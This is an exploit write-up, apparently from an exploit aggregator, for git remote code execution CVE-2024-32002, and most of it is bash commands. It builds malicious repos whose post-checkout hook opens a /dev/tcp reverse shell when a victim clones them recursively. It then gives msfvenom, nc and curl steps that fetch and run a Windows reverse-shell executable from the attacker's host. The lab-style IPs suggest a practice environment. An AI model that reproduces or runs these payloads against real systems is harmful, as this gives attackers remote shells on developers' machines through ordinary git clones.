Exploit for Unrestricted Upload of File with Dangerous Type in Git CVE-2024-32002

## https://sploitus.com/exploit?id=D0336BF6-6AF7-5C0D-8762-125A36BDF34F
######################
GIT RCE CVE-2024-32002
######################

***********
Description
***********

| CVE-2024-32002
| https://www.tarlogic.com/blog/cve-2024-32002-vulnerability-git/

|

*******
Exploit
*******

| First you need to create "calledrepo" "commandrepo" repos on git.
| Victim will later call the calledrepo with "git clone --recursive calledrepo.git" that redirect to commandrepo and execute the hook script.
| This bash reverseshell payload works on WINDOWS and LINUX.
|
| I'm using git cli in docker because i don't want to get trouble with my system git config, but it's optionnal

.. code-block:: bash

  # Stat a debian docker instance
  docker run --rm -it debian

  # Install git
  apt update
  apt install -y git

| Configuring git

.. code-block:: bash

  git config --global user.email "whatever"
  git config --global user.name "whatever"
  git config --global protocol.file.allow always
  git config --global core.symlinks true
  git config --global init.defaultBranch main

| Setting vars

.. code-block:: bash

  GIT_IP="10.129.19.99"
  GIT_USER="charles"
  GIT_PORT="3000"
  LHOST="10.10.14.113"
  LPORT="4444"

| Populating repos

.. code-block:: bash

  cd /tmp
  rm -rf calledrepo commandrepo
  
  git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git"
  cd commandrepo
  mkdir -p y/hooks
  cat <<EOF>y/hooks/post-checkout
  #!/bin/bash
  /bin/bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1"
  EOF
  chmod +x y/hooks/post-checkout
  git add y/hooks/post-checkout
  git commit -m "post-checkout"
  git push
  cd ..
  
  git clone "http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"
  cd calledrepo
  git submodule add --name x/y "http://$GIT_IP:$GIT_PORT/$GIT_USER/commandrepo.git" A/modules/x
  git commit -m "add-submodule"
  printf ".git" > dotgit.txt
  git hash-object -w --stdin < dotgit.txt > dot-git.hash
  printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
  git update-index --index-info < index.info
  git commit -m "add-symlink"
  git push
  cd ..

  # Echo the command to run on victim
  echo "git clone --recursive http://$GIT_IP:$GIT_PORT/$GIT_USER/calledrepo.git"

|

*******
Windows
*******

| After exploiting on windows you will get a git bash that have some issues/restrictions :
|

.. code-block:: bash

  $ C:\windows\System32\whoami.exe /all
  bash: C:windowsSystem32whoami.exe: command not found

| If you want to escape from this env, you can call a new reverseshell
|

.. code-block:: bash

  # Attacker side
  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe
  sudo cp payload.exe /var/www/html
  sudo nc -nvlp 443 -s 10.10.14.113

.. code-block:: bash

  # Windows side
  cd ~/
  curl http://10.10.14.113/payload.exe -O payload.exe
  ./payload.exe

|

| Don't forget that git bash may have path priority over windows commands.
| You can run the windows command using the full path.
|

.. code-block:: bash

  C:\windows\System32\whoami.exe /all

|